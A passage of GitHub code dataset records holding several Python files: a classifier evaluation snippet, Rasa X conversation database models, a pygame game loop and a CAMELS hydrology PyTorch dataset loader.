RandomForestClassifier()\n clf.fit(embedding[train_mask], y_train)\n predict_results = clf.predict(embedding[test_mask])\n report = classification_report(y_test, predict_results, digits=3)\n print(report)\n ClassificationReportAVG.save_cr(report, './log-{}.txt'.format('mean'))\n reports.append(report)\n\nClassificationReportAVG.cr_avg(reports)\n","repo_name":"zourunxin/2020-yl-mentor-group","sub_path":"temp/zrx_temp.py","file_name":"zrx_temp.py","file_ext":"py","file_size_in_byte":3382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"14604813098","text":"import json\nfrom typing import Dict, Any, Text, Set, Union, List\n\nimport sqlalchemy as sa\nfrom sqlalchemy.orm import object_session, relationship\nfrom sqlalchemy import and_\n\nimport rasax.community.constants as constants\nfrom rasax.community.database.base import Base\nfrom rasax.community.database import utils\n\n\nclass Conversation(Base):\n \"\"\"Stores the user's conversation and its metadata.\"\"\"\n\n __tablename__ = \"conversation\"\n\n sender_id = sa.Column(sa.String, primary_key=True)\n number_user_messages = sa.Column(sa.Integer, default=0)\n latest_input_channel = sa.Column(sa.String)\n latest_event_time = sa.Column(sa.Float) # latest event time as unix timestamp\n in_training_data = sa.Column(sa.Boolean, default=True)\n review_status = sa.Column(\n sa.String, default=constants.CONVERSATION_STATUS_UNREAD, nullable=False\n )\n\n minimum_action_confidence = sa.Column(sa.Float)\n maximum_action_confidence = sa.Column(sa.Float)\n minimum_intent_confidence = sa.Column(sa.Float)\n maximum_intent_confidence = sa.Column(sa.Float)\n\n evaluation = sa.Column(sa.Text)\n interactive = sa.Column(sa.Boolean, default=False)\n created_by = sa.Column(\n sa.String, sa.ForeignKey(\"rasa_x_user.username\"), nullable=True, index=True\n )\n\n events = relationship(\n \"ConversationEvent\",\n cascade=\"all, delete-orphan\",\n back_populates=\"conversation\",\n order_by=lambda: ConversationEvent.timestamp.asc(),\n )\n\n message_logs = relationship(\"MessageLog\", back_populates=\"conversation\")\n\n unique_policies = relationship(\n \"ConversationPolicyMetadata\",\n cascade=\"all, delete-orphan\",\n back_populates=\"conversation\",\n )\n unique_actions = relationship(\n \"ConversationActionMetadata\",\n cascade=\"all, delete-orphan\",\n back_populates=\"conversation\",\n )\n unique_intents = relationship(\n \"ConversationIntentMetadata\",\n cascade=\"all, delete-orphan\",\n back_populates=\"conversation\",\n )\n unique_entities = relationship(\n \"ConversationEntityMetadata\",\n cascade=\"all, delete-orphan\",\n back_populates=\"conversation\",\n )\n\n corrected_messages = relationship(\n \"ConversationMessageCorrection\",\n cascade=\"all, delete-orphan\",\n back_populates=\"conversation\",\n )\n\n tags = relationship(\n \"ConversationTag\",\n secondary=\"conversation_to_tag_mapping\",\n backref=\"conversations\",\n )\n\n def tags_set(self) -> Set[int]:\n return {t.id for t in self.tags}\n\n @property\n def has_flagged_messages(self) -> bool:\n result = (\n object_session(self)\n .query(Conversation)\n .filter(\n and_(\n Conversation.events.any(\n and_(\n ConversationEvent.conversation_id == self.sender_id,\n ConversationEvent.is_flagged,\n )\n )\n )\n )\n .first()\n )\n return result is not None\n\n def as_dict(self) -> Dict[Text, Any]:\n from rasax.community.services.event_service import EventService\n\n result = {\n \"sender_id\": self.sender_id,\n \"sender_name\": 
EventService.get_sender_name(self), # displayed in the UI\n \"latest_event_time\": self.latest_event_time,\n \"latest_input_channel\": self.latest_input_channel,\n \"intents\": [i.intent for i in self.unique_intents],\n \"actions\": [a.action for a in self.unique_actions],\n \"minimum_action_confidence\": self.minimum_action_confidence,\n \"maximum_action_confidence\": self.maximum_action_confidence,\n \"minimum_intent_confidence\": self.minimum_intent_confidence,\n \"maximum_intent_confidence\": self.maximum_intent_confidence,\n \"in_training_data\": self.in_training_data,\n \"review_status\": self.review_status,\n \"policies\": [p.policy for p in self.unique_policies],\n \"n_user_messages\": self.number_user_messages,\n \"has_flagged_messages\": self.has_flagged_messages,\n \"corrected_messages\": [\n {\"message_timestamp\": c.message_timestamp, \"intent\": c.intent}\n for c in self.corrected_messages\n ],\n \"interactive\": self.interactive,\n \"tags\": list(self.tags_set()),\n \"created_by\": self.created_by,\n }\n\n return result\n\n\nclass ConversationTag(Base):\n \"\"\"Stores conversation tags.\"\"\"\n\n __tablename__ = \"conversation_tag\"\n\n id = sa.Column(sa.Integer, utils.create_sequence(__tablename__), primary_key=True)\n value = sa.Column(sa.String, nullable=False, index=True)\n color = sa.Column(sa.String, nullable=False)\n\n def as_dict(self) -> Dict[Text, Union[Text, int, List[Text]]]:\n return {\n \"id\": self.id,\n \"value\": self.value,\n \"color\": self.color,\n \"conversations\": [m.sender_id for m in self.conversations],\n }\n\n\n# Stores mapping between Conversation and ConversationTag\nconversation_to_tag_mapping = sa.Table(\n \"conversation_to_tag_mapping\",\n Base.metadata,\n sa.Column(\n \"conversation_id\",\n sa.String,\n sa.ForeignKey(\"conversation.sender_id\"),\n nullable=False,\n index=True,\n ),\n sa.Column(\n \"tag_id\",\n sa.String,\n utils.create_sequence(\"conversation_to_tag_mapping\"),\n sa.ForeignKey(\"conversation_tag.id\"),\n nullable=False,\n index=True,\n ),\n)\n\n\nclass ConversationEvent(Base):\n \"\"\"Stores a single event which happened during a conversation.\"\"\"\n\n __tablename__ = \"conversation_event\"\n\n id = sa.Column(sa.Integer, utils.create_sequence(__tablename__), primary_key=True)\n conversation_id = sa.Column(\n sa.String, sa.ForeignKey(\"conversation.sender_id\"), index=True, nullable=False\n )\n conversation = relationship(\"Conversation\", back_populates=\"events\")\n\n type_name = sa.Column(sa.String, nullable=False)\n timestamp = sa.Column(\n sa.Float, index=True, nullable=False\n ) # time of the event as unix timestamp\n intent_name = sa.Column(sa.String)\n action_name = sa.Column(sa.String)\n slot_name = sa.Column(sa.String)\n slot_value = sa.Column(sa.Text)\n policy = sa.Column(sa.String)\n is_flagged = sa.Column(sa.Boolean, default=False, nullable=False)\n data = sa.Column(sa.Text)\n message_log = relationship(\"MessageLog\", back_populates=\"event\", uselist=False)\n evaluation = sa.Column(sa.Text)\n rasa_environment = sa.Column(sa.String, default=constants.DEFAULT_RASA_ENVIRONMENT)\n\n def as_rasa_dict(self) -> Dict[Text, Any]:\n \"\"\"Return a JSON-like representation of the internal Rasa (framework)\n event referenced by this `ConversationEvent`. 
Attach some information\n specific to Rasa X as part of the Rasa event metadata.\n\n Returns:\n A JSON-like representation of the Rasa event referenced by this\n database entity.\n \"\"\"\n\n d = json.loads(self.data)\n\n # Add some metadata specific to Rasa X (namespaced with \"rasa_x_\")\n metadata = d.get(\"metadata\") or {}\n metadata.update({\"rasa_x_flagged\": self.is_flagged, \"rasa_x_id\": self.id})\n d[\"metadata\"] = metadata\n\n return d\n\n\nclass MessageLog(Base):\n \"\"\"Stores the intent classification results of the user messages.\n\n Indexed columns:\n - `id` (Revision: `2a216ed121dd`)\n - `hash` (Revision: `af3596f6982f`)\n - `(archived, in_training_data)` (Revision: `af3596f6982f`)\n \"\"\"\n\n __tablename__ = \"message_log\"\n\n id = sa.Column(sa.Integer, utils.create_sequence(__tablename__), primary_key=True)\n hash = sa.Column(sa.String, index=True)\n model = sa.Column(sa.String)\n archived = sa.Column(sa.Boolean, default=False)\n time = sa.Column(sa.Float) # time of the log as unix timestamp\n text = sa.Column(sa.Text)\n intent = sa.Column(sa.String)\n confidence = sa.Column(sa.Float)\n intent_ranking = sa.Column(sa.Text)\n entities = sa.Column(sa.Text)\n in_training_data = sa.Column(sa.Boolean, default=False)\n\n event_id = sa.Column(sa.Integer, sa.ForeignKey(\"conversation_event.id\"))\n event = relationship(\n \"ConversationEvent\", uselist=False, back_populates=\"message_log\"\n )\n\n conversation_id = sa.Column(sa.String, sa.ForeignKey(\"conversation.sender_id\"))\n conversation = relationship(\"Conversation\", back_populates=\"message_logs\")\n\n def as_dict(self) -> Dict[Text, Any]:\n return {\n \"id\": self.id,\n \"time\": self.time,\n \"model\": self.model,\n \"hash\": self.hash,\n \"conversation_id\": self.conversation_id,\n \"event_id\": self.event_id,\n \"user_input\": {\n \"text\": self.text,\n \"intent\": {\"name\": self.intent, \"confidence\": self.confidence},\n \"intent_ranking\": json.loads(self.intent_ranking),\n \"entities\": json.loads(self.entities),\n },\n }\n\n\nclass ConversationPolicyMetadata(Base):\n \"\"\"Stores the distinct set of used policies in a conversation.\"\"\"\n\n __tablename__ = \"conversation_policy_metadata\"\n\n conversation_id = sa.Column(\n sa.String, sa.ForeignKey(\"conversation.sender_id\"), primary_key=True\n )\n policy = sa.Column(sa.String, primary_key=True)\n conversation = relationship(\"Conversation\", back_populates=\"unique_policies\")\n\n\nclass ConversationActionMetadata(Base):\n \"\"\"Stores the distinct set of used actions in a conversation.\"\"\"\n\n __tablename__ = \"conversation_action_metadata\"\n\n conversation_id = sa.Column(\n sa.String, sa.ForeignKey(\"conversation.sender_id\"), primary_key=True\n )\n action = sa.Column(sa.String, primary_key=True)\n conversation = relationship(\"Conversation\", back_populates=\"unique_actions\")\n\n\nclass ConversationIntentMetadata(Base):\n \"\"\"Stores the distinct set of used intents in a conversation.\"\"\"\n\n __tablename__ = \"conversation_intent_metadata\"\n\n conversation_id = sa.Column(\n sa.String, sa.ForeignKey(\"conversation.sender_id\"), primary_key=True\n )\n\n intent = sa.Column(sa.String, primary_key=True)\n conversation = relationship(\"Conversation\", back_populates=\"unique_intents\")\n\n\nclass ConversationEntityMetadata(Base):\n \"\"\"Stores the distinct set of used entities in a conversation.\"\"\"\n\n __tablename__ = \"conversation_entity_metadata\"\n\n conversation_id = sa.Column(\n sa.String, sa.ForeignKey(\"conversation.sender_id\"), 
primary_key=True\n )\n\n entity = sa.Column(sa.String, primary_key=True)\n conversation = relationship(\"Conversation\", back_populates=\"unique_entities\")\n\n\nclass ConversationMessageCorrection(Base):\n \"\"\"Stores post hoc corrections of intents in a conversation.\"\"\"\n\n __tablename__ = \"message_correction\"\n\n conversation_id = sa.Column(\n sa.String, sa.ForeignKey(\"conversation.sender_id\"), primary_key=True\n )\n\n # time of the message correction as unix timestamp\n message_timestamp = sa.Column(sa.Float, primary_key=True)\n intent = sa.Column(sa.String)\n conversation = relationship(\"Conversation\", back_populates=\"corrected_messages\")\n","repo_name":"hoavosac99/Chat-bot-tuyen-sinh","sub_path":"rasax/community/database/conversation.py","file_name":"conversation.py","file_ext":"py","file_size_in_byte":11330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"34701604035","text":"#!/usr/bin/python\r\n## Course: OOP and patterns in Python PL\r\n## Week: 5\r\n## Programming task: final project is to make a game \"Wizard in a cave\"\r\n## Student: v.v.panfilov@gmail.com\r\n## https://www.coursera.org/user/2b245f54c4482a14f06c1497686513b5\r\n##\r\n## Code repository at https://github.com/CyberNet-Git/wizard\r\n##\r\n\r\nimport pygame\r\nimport os\r\n\r\nimport Objects\r\nimport ScreenEngine as SE\r\nfrom Logic import GameEngine\r\nimport Service\r\nimport const\r\n\r\npygame.init()\r\ngameDisplay = pygame.display.set_mode(const.SCREEN_DIM, pygame.NOFRAME)\r\npygame.display.set_caption(\"MyRPG\")\r\nKEYBOARD_CONTROL = True\r\n\r\nif not KEYBOARD_CONTROL:\r\n import numpy as np\r\n answer = np.zeros(4, dtype=float)\r\n\r\nclosebtn = pygame.Rect(754, 2, 43, 43)\r\nsize = 32 # 60\r\n\r\ndef game_init():\r\n global engine, movement, direction\r\n engine = GameEngine(size)\r\n movement= dict(zip(\r\n [pygame.K_UP, pygame.K_DOWN, pygame.K_LEFT, pygame.K_RIGHT],\r\n [engine.move_up, engine.move_down, engine.move_left, engine.move_right]\r\n ))\r\n direction = dict(zip(\r\n [pygame.K_UP, pygame.K_DOWN, pygame.K_LEFT, pygame.K_RIGHT],\r\n [(0,-1),(0,1),(-1,0),(1,0)]\r\n ))\r\ngame_init()\r\n\r\nwhile engine.working:\r\n\r\n if KEYBOARD_CONTROL:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n engine.working = False\r\n\r\n if event.type == pygame.MOUSEBUTTONUP:\r\n if event.button == 1:\r\n if closebtn.collidepoint(event.pos):\r\n engine.working = False\r\n elif event.button == 3:\r\n pass\r\n\r\n\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_h:\r\n engine.show_help = not engine.show_help\r\n if engine.show_help:\r\n continue\r\n if event.key == pygame.K_KP_PLUS:\r\n size = engine.sprite_size\r\n size = size + 16 if size < 64 else size\r\n #size = 64 if size == 48 else size\r\n engine.set_sprite_size(size)\r\n if event.key == pygame.K_KP_MINUS:\r\n size = engine.sprite_size\r\n size = size - 16 if size > 16 else size\r\n #size = 32 if size == 48 else size\r\n engine.set_sprite_size(size)\r\n if event.key == pygame.K_r:\r\n game_init()\r\n if event.key == pygame.K_m:\r\n engine.show_battle = not engine.show_battle\r\n engine.active_button = 0\r\n if event.key == pygame.K_ESCAPE:\r\n engine.working = False\r\n\r\n if engine.interaction:\r\n if event.key in [pygame.K_LEFT, pygame.K_RIGHT]:\r\n engine.active_button ^= 1\r\n elif event.key in [pygame.K_RETURN, pygame.K_SPACE]:\r\n engine.user_choice = engine.active_button\r\n engine.interact()\r\n\r\n # process Hero movement events\r\n 
elif engine.game_process:\r\n if event.key in movement.keys():\r\n if movement[event.key]():\r\n pass\r\n elif event.mod & pygame.KMOD_CTRL:\r\n engine.break_wall(direction[event.key])\r\n\r\n if event.key == pygame.K_RETURN:\r\n #create_game()\r\n pass\r\n else:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n engine.working = False\r\n if engine.game_process:\r\n actions = [\r\n engine.move_right,\r\n engine.move_left,\r\n engine.move_up,\r\n engine.move_down,\r\n ]\r\n answer = np.random.randint(0, 100, 4)\r\n prev_score = engine.score\r\n move = actions[np.argmax(answer)]()\r\n state = pygame.surfarray.array3d(gameDisplay)\r\n reward = engine.score - prev_score\r\n print(reward)\r\n else:\r\n #create_game()\r\n pass\r\n\r\n gameDisplay.blit(engine.drawer, (5, 35))\r\n engine.drawer.draw(gameDisplay)\r\n\r\n pygame.display.flip()\r\n\r\npygame.display.quit()\r\npygame.quit()\r\nexit(0)\r\n","repo_name":"CyberNet-Git/wizard","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":4410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"18691323904","text":"import numpy as np\nimport pandas as pd\nimport torch\n\nfrom torch.utils.data import Dataset\nfrom pathlib import Path\nfrom bisect import bisect_right\nfrom abc import ABCMeta, abstractmethod\n\n\nclass AbstractReader(metaclass=ABCMeta):\n \"\"\"Abstract data reader.\n\n Its subclasses need to ensure conversion from raw data to pandas.DataFrame,\n and process invalid data item\n \"\"\"\n\n @abstractmethod\n def _load_data(self, *args, **kwargs):\n \"\"\"\n Subclasses must implement loading inputs and target data.\n \"\"\"\n pass\n\n @abstractmethod\n def _process_invalid_data(self, *args, **kwargs):\n \"\"\"\n Subclasses must implement how to process invalid data item.\n \"\"\"\n pass\n\n @abstractmethod\n def get_df_x(self):\n \"\"\"\n Subclasses must return inputs data with a form of pandas.DataFrame.\n \"\"\"\n pass\n\n @abstractmethod\n def get_df_y(self):\n \"\"\"\n Subclasses must return target data with a form of pandas.DataFrame.\n \"\"\"\n pass\n\n\nclass AbstractStaticReader:\n \"\"\"Abstract static data reader.\n\n 1. Reads data from a static attributes file (.csv).\n 2. Select used attributes and do normalization.\n 3. 
Need to ensure conversion from static attributes to pandas.DataFrame.\n    \"\"\"\n\n    @abstractmethod\n    def get_df_static(self, basin):\n        \"\"\"\n        Subclasses must return static data as a pandas.DataFrame for a specific basin.\n        \"\"\"\n        pass\n\n\nclass DaymetHydroReader(AbstractReader):\n    camels_root = None  # needs to be set in class method \"init_root\"\n    forcing_root = None\n    discharge_root = None\n    forcing_cols = [\"Year\", \"Mnth\", \"Day\", \"Hr\", \"dayl(s)\", \"prcp(mm/day)\", \"srad(W/m2)\", \"swe(mm)\", \"tmax(C)\",\n                    \"tmin(C)\", \"vp(Pa)\"]\n    features = [\"prcp(mm/day)\", \"srad(W/m2)\", \"tmax(C)\", \"tmin(C)\", \"vp(Pa)\"]\n    discharge_cols = [\"basin\", \"Year\", \"Mnth\", \"Day\", \"QObs\", \"flag\"]\n    target = [\"QObs(mm/d)\"]\n\n    @classmethod\n    def init_root(cls, camels_root):  # often overridden by subclasses\n        cls.camels_root = Path(camels_root)\n        cls.forcing_root = cls.camels_root / \"basin_mean_forcing\" / \"daymet\"\n        cls.discharge_root = cls.camels_root / \"usgs_streamflow\"\n\n    def __init__(self, basin: str):\n        self.basin = basin\n        self.area = None\n        df = self._load_data()\n        df = self._process_invalid_data(df)\n        self.df_x = df[self.features]  # Datetime as index\n        self.df_y = df[self.target]  # Datetime as index\n\n    def get_df_x(self):\n        return self.df_x\n\n    def get_df_y(self):\n        return self.df_y\n\n    def _load_data(self):\n        df_forcing = self._load_forcing()\n        df_discharge = self._load_discharge()\n        df = pd.concat([df_forcing, df_discharge], axis=1)\n\n        return df\n\n    # Loading meteorological data\n    def _load_forcing(self):\n        files = list(self.forcing_root.glob(f\"**/{self.basin}_*.txt\"))\n        if len(files) == 0:\n            raise RuntimeError(f\"No forcing file found for Basin {self.basin}\")\n        elif len(files) >= 2:\n            raise RuntimeError(f\"Redundant forcing files found for Basin {self.basin}\")\n        else:\n            file_path = files[0]\n\n        # read-in data and convert date to datetime index\n        df = pd.read_csv(file_path, sep=r\"\\s+\", header=3)  # \\s+ means matching any whitespace character\n        dates = df.Year.map(str) + \"/\" + df.Mnth.map(str) + \"/\" + df.Day.map(str)\n        df.index = pd.to_datetime(dates, format=\"%Y/%m/%d\")\n\n        # Line 2 (starting at 0) of the file is the area value\n        with open(file_path) as fp:\n            # readline is faster than readlines when only the first few lines are needed\n            fp.readline()\n            fp.readline()\n            content = fp.readline().strip()\n            area = int(content)\n        self.area = area\n\n        return df[self.features]\n\n    # Loading runoff data\n    def _load_discharge(self):\n        files = list(self.discharge_root.glob(f\"**/{self.basin}_*.txt\"))\n        if len(files) == 0:\n            raise RuntimeError(f\"No discharge file found for Basin {self.basin}\")\n        elif len(files) >= 2:\n            raise RuntimeError(f\"Redundant discharge files found for Basin {self.basin}\")\n        else:\n            file_path = files[0]\n\n        df = pd.read_csv(file_path, sep=r\"\\s+\", header=None, names=self.discharge_cols)\n        dates = df.Year.map(str) + \"/\" + df.Mnth.map(str) + \"/\" + df.Day.map(str)\n        df.index = pd.to_datetime(dates, format=\"%Y/%m/%d\")\n\n        # Convert discharge from cubic feet per second to mm per day:\n        # 1 ft^3 = 28,316,846.592 mm^3; multiplying by 86400 s/day gives mm^3/day,\n        # and dividing by the basin area (m^2, scaled to mm^2 via 10**6) gives mm/day.\n        assert len(self.target) == 1\n        df[self.target[0]] = 28316846.592 * df[\"QObs\"] * 86400 / (self.area * 10 ** 6)\n\n        return df[self.target]\n\n    # Processing invalid data\n    def _process_invalid_data(self, df: pd.DataFrame):\n        # Delete all rows where NaN exists (only discharge has NaN in this dataset)\n        len_raw = len(df)\n        df = df.dropna()\n        len_drop_nan = len(df)\n        if len_raw > len_drop_nan:\n            print(f\"Deleted {len_raw - len_drop_nan} records because of NaNs 
{self.basin}\")\n\n # Deletes all records, where no discharge was measured (-999)\n df = df.drop((df[df['QObs(mm/d)'] < 0]).index)\n len_drop_neg = len(df)\n if len_drop_nan > len_drop_neg:\n print(f\"Deleted {len_drop_nan - len_drop_neg} records because of negative discharge {self.basin}\")\n\n return df\n\n\nclass MaurerExtHydroReader(DaymetHydroReader):\n camels_root = None # needs to be set in class method \"init_root\"\n forcing_root = None\n discharge_root = None\n\n @classmethod\n def init_root(cls, camels_root):\n cls.camels_root = Path(camels_root)\n cls.forcing_root = cls.camels_root / \"basin_mean_forcing\" / \"maurer_extended\"\n cls.discharge_root = cls.camels_root / \"usgs_streamflow\"\n\n def __init__(self, basin: str):\n super().__init__(basin)\n\n\nclass NldasExtHydroReader(DaymetHydroReader):\n camels_root = None # needs to be set in class method \"init_root\"\n forcing_root = None\n discharge_root = None\n forcing_cols = [\"Year\", \"Mnth\", \"Day\", \"Hr\", \"Dayl(s)\", \"PRCP(mm/day)\", \"SRAD(W/m2)\", \"SWE(mm)\", \"Tmax(C)\",\n \"Tmin(C)\", \"Vp(Pa)\"]\n features = [\"PRCP(mm/day)\", \"SRAD(W/m2)\", \"Tmax(C)\", \"Tmin(C)\", \"Vp(Pa)\"]\n\n @classmethod\n def init_root(cls, camels_root):\n cls.camels_root = Path(camels_root)\n cls.forcing_root = cls.camels_root / \"basin_mean_forcing\" / \"nldas_extended\"\n cls.discharge_root = cls.camels_root / \"usgs_streamflow\"\n\n def __init__(self, basin: str):\n super().__init__(basin)\n\n\nclass HydroReaderFactory:\n \"\"\"\n Simple factory for producing HydroReader\n \"\"\"\n\n @staticmethod\n def get_hydro_reader(camels_root, forcing_type, basin):\n if forcing_type == \"daymet\":\n DaymetHydroReader.init_root(camels_root)\n reader = DaymetHydroReader(basin)\n elif forcing_type == \"maurer_extended\":\n MaurerExtHydroReader.init_root(camels_root)\n reader = MaurerExtHydroReader(basin)\n elif forcing_type == \"nldas_extended\":\n NldasExtHydroReader.init_root(camels_root)\n reader = NldasExtHydroReader(basin)\n else:\n raise RuntimeError(f\"No such hydro reader type: {forcing_type}\")\n\n return reader\n\n\nclass CamelsDataset(Dataset):\n \"\"\"CAMELS dataset working with subclasses of AbstractHydroReader.\n\n It works in a list way: the model trains, validates and tests with all of basins in attribute:basins_list.\n\n Attributes:\n camels_root: str\n The root of CAMELS dataset.\n basins_list: list of str\n A list contains all needed basins-ids (8-digit code).\n past_len: int\n Length of the past time steps for discharge data.\n pred_len: int\n Length of the predicting time steps for discharge data.\n And it is worth noting that the used length of meteorological data is (past_len + :pred_len).\n stage: str\n One of ['train', 'val', 'test'], decide whether calculating mean and std or not.\n Calculate mean and std in training stage.\n dates: List of pd.DateTimes\n Means the date range that is used, containing two elements, i.e, start date and end date.\n x_dict: dict as {basin: np.ndarray}\n Mapping a basin to its corresponding meteorological data.\n y_dict: dict as {basin: np.ndarray}\n Mapping a basin to its corresponding discharge data.\n length_ls: list of int\n Contains number of serialized sequences of each basin corresponding to basins_list.\n index_ls: list of int\n Created from length_ls, used in __getitem__ method.\n num_samples: int\n Number of serialized sequences of all basins.\n x_mean: numpy.ndarray\n Mean of input features derived from the training stage.\n Has to be provided for 'val' or 'test' stage.\n Can be 
retrieved if calling .get_means() on the data set.\n y_mean: numpy.ndarray\n Mean of output features derived from the training stage.\n Has to be provided for 'val' or 'test' stage.\n Can be retrieved if calling .get_means() on the data set.\n x_std: numpy.ndarray\n Std of input features derived from the training stage.\n Has to be provided for 'val' or 'test' stage.\n Can be retrieved if calling .get_stds() on the data set.\n y_std: numpy.ndarray\n Std of output features derived from the training stage.\n Has to be provided for 'val' or 'test' stage.\n Can be retrieved if calling .get_stds() on the data set.\n \"\"\"\n\n def __init__(self, camels_root: str, forcing_type: str, basins_list: list, past_len: int, pred_len: int, stage: str,\n dates: list, x_mean=None, y_mean=None, x_std=None, y_std=None, y_stds_dict=None):\n \"\"\"Initialization\n\n x_mean, y_mean, x_std, y_std should be provided if stage != \"train\".\n \"\"\"\n self.camels_root = camels_root\n self.basins_list = basins_list\n self.past_len = past_len\n self.pred_len = pred_len\n self.stage = stage\n self.dates = dates\n self.x_dict = dict()\n self.y_dict = dict()\n self.date_index_dict = dict()\n self.length_ls = list()\n\n if y_stds_dict is None:\n self.y_stds_dict = dict()\n else:\n self.y_stds_dict = y_stds_dict\n\n self._load_data(forcing_type)\n # Calculate mean and std\n if self.stage == 'train':\n self.x_mean, self.x_std = self.calc_mean_and_std(self.x_dict)\n self.y_mean, self.y_std = self.calc_mean_and_std(self.y_dict)\n else:\n self.x_mean = x_mean\n self.y_mean = y_mean\n self.x_std = x_std\n self.y_std = y_std\n self.normalize_data()\n\n self.num_samples = 0\n for item in self.length_ls:\n self.num_samples += item\n\n self.index_ls = [0]\n for i in range(len(self.length_ls)):\n v = self.index_ls[i] + self.length_ls[i]\n self.index_ls.append(v)\n\n def __len__(self):\n return self.num_samples\n\n def __getitem__(self, idx: int):\n basin_idx = bisect_right(self.index_ls, idx) - 1\n local_idx = idx - self.index_ls[basin_idx]\n basin = self.basins_list[basin_idx]\n x_seq = self.x_dict[basin][local_idx: local_idx + self.past_len + self.pred_len, :]\n y_seq_past = self.y_dict[basin][local_idx: local_idx + self.past_len, :]\n y_seq_future = self.y_dict[basin][local_idx + self.past_len: local_idx + self.past_len + self.pred_len, :]\n\n return x_seq, y_seq_past, y_seq_future, self.y_stds_dict[basin]\n\n def _load_data(self, forcing_type):\n # Loading vanilla data\n basin_number = len(self.basins_list)\n for idx, basin in enumerate(self.basins_list):\n print(self.stage, f\"{basin}: loading data %.4f\" % (idx / basin_number))\n reader = HydroReaderFactory.get_hydro_reader(self.camels_root, forcing_type, basin)\n df_x = reader.get_df_x()\n df_y = reader.get_df_y()\n\n # Select date\n df_x = df_x[self.dates[0]:self.dates[1]]\n df_y = df_y[self.dates[0]:self.dates[1]]\n assert len(df_x) == len(df_y)\n self.date_index_dict[basin] = df_x.index\n\n # Select used features and discharge\n x = df_x.values.astype(\"float32\")\n y = df_y.values.astype(\"float32\")\n self.x_dict[basin] = x\n self.y_dict[basin] = y\n\n self.length_ls.append(len(x) - self.past_len - self.pred_len + 1)\n # Calculate mean and std in training stage\n if self.stage == 'train':\n self.y_stds_dict[basin] = y.std(axis=0).item()\n\n @staticmethod\n def calc_mean_and_std(data_dict):\n data_all = np.concatenate(list(data_dict.values()), axis=0) # CAN NOT serializable\n nan_mean = np.nanmean(data_all, axis=0)\n nan_std = np.nanstd(data_all, axis=0)\n return 
nan_mean, nan_std\n\n    def _local_normalization(self, feature: np.ndarray, variable: str) -> np.ndarray:\n        if variable == 'inputs':\n            feature = (feature - self.x_mean) / self.x_std\n        elif variable == 'output':\n            feature = (feature - self.y_mean) / self.y_std\n        else:\n            raise RuntimeError(f\"Unknown variable type {variable}\")\n        return feature\n\n    def normalize_data(self):\n        # Normalize data\n        for idx, basin in enumerate(self.basins_list):\n            print(self.stage, \"Normalizing %.4f\" % (idx / len(self.basins_list)))\n            x = self.x_dict[basin]\n            y = self.y_dict[basin]\n            # Normalize data\n            x_norm = self._local_normalization(x, variable='inputs')\n            y_norm = self._local_normalization(y, variable='output')\n            self.x_dict[basin] = x_norm\n            self.y_dict[basin] = y_norm\n\n    def local_rescale(self, feature: np.ndarray, variable: str) -> np.ndarray:\n        if variable == 'inputs':\n            feature = feature * self.x_std + self.x_mean\n        elif variable == 'output':\n            feature = feature * self.y_std + self.y_mean\n        else:\n            raise RuntimeError(f\"Unknown variable type {variable}\")\n        return feature\n\n    def get_means(self):\n        return self.x_mean, self.y_mean\n\n    def get_stds(self):\n        return self.x_std, self.y_std\n\n    @classmethod\n    def get_instance(cls, past_len: int, pred_len: int, stage: str, specific_cfg: dict,\n                     x_mean=None, y_mean=None, x_std=None, y_std=None, y_stds_dict=None):\n        final_data_path = specific_cfg[\"final_data_path\"]\n        camels_root = specific_cfg[\"camels_root\"]\n        basins_list = specific_cfg[\"basins_list\"]\n        forcing_type = specific_cfg[\"forcing_type\"]\n        start_date = specific_cfg[\"start_date\"]\n        end_date = specific_cfg[\"end_date\"]\n        if final_data_path is None:\n            dates = [start_date, end_date]\n            instance = cls(camels_root, forcing_type, basins_list, past_len, pred_len, stage,\n                           dates, x_mean, y_mean, x_std, y_std, y_stds_dict)\n            return instance\n        else:\n            if final_data_path.exists():\n                instance = torch.load(final_data_path)\n                return instance\n            else:\n                dates = [start_date, end_date]\n                instance = cls(camels_root, forcing_type, basins_list, past_len, pred_len, stage,\n                               dates, x_mean, y_mean, x_std, y_std, y_stds_dict)\n                final_data_path.parent.mkdir(exist_ok=True, parents=True)\n                torch.save(instance, final_data_path)\n                return instance\n\n\nclass StaticReader(AbstractStaticReader):\n    \"\"\"Static hydrological data reader.\n\n    Reads data from a selected, normalized static attributes file (.csv)\n    and converts the static attributes to a pandas.DataFrame.\n    \"\"\"\n\n    def __init__(self, camels_root):\n        self.camels_root = Path(camels_root)\n        self.static_file_path = Path(\n            \"/data1/du/CAMELS/CAMELS-US\") / \"camels_attributes_v2.0\" / \"selected_norm_static_attributes.csv\"\n        self.df_static = pd.read_csv(self.static_file_path, header=0, dtype={\"gauge_id\": str}).set_index(\"gauge_id\")\n        self.df_static = self.df_static.astype(\"float32\")\n\n    def get_df_static(self, basin):\n        return self.df_static.loc[[basin]].values\n\n\nclass CamelsDatasetWithStatic(CamelsDataset):\n    \"\"\"CAMELS dataset with static attributes injected into serialized sequences.\n\n    Inherits from CamelsDataset.\n\n    \"\"\"\n\n    def __init__(self, camels_root: str, forcing_type: str, basins_list: list, past_len: int, pred_len: int, stage: str,\n                 dates: list, x_mean=None, y_mean=None, x_std=None, y_std=None, y_stds_dict=None):\n        self.static_reader = StaticReader(camels_root)\n        self.norm_static_fea = dict()\n        super().__init__(camels_root, forcing_type, basins_list, past_len, pred_len, stage,\n                         dates, x_mean, y_mean, x_std, y_std, y_stds_dict)\n\n    
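# (Descriptive note, added: static catchment attributes are loaded once per\n    # basin in _load_data() and, in normalize_data(), tiled across all timesteps\n    # and concatenated onto the normalized dynamic inputs along the feature axis.)\n    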
